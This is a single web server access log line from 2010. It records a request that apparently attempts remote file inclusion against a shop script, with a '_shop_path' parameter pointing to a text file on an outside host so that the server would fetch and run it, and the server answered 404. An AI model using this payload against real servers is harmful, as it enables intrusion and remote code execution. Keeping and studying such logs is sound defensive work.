74.86.155.18 - - [23/Feb/2010:04:49:06 -0500] "GET /logs/error_log.Q109050900//shop//main.php?_shop_path=http://storm.designrus.dk/modules/fx29id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
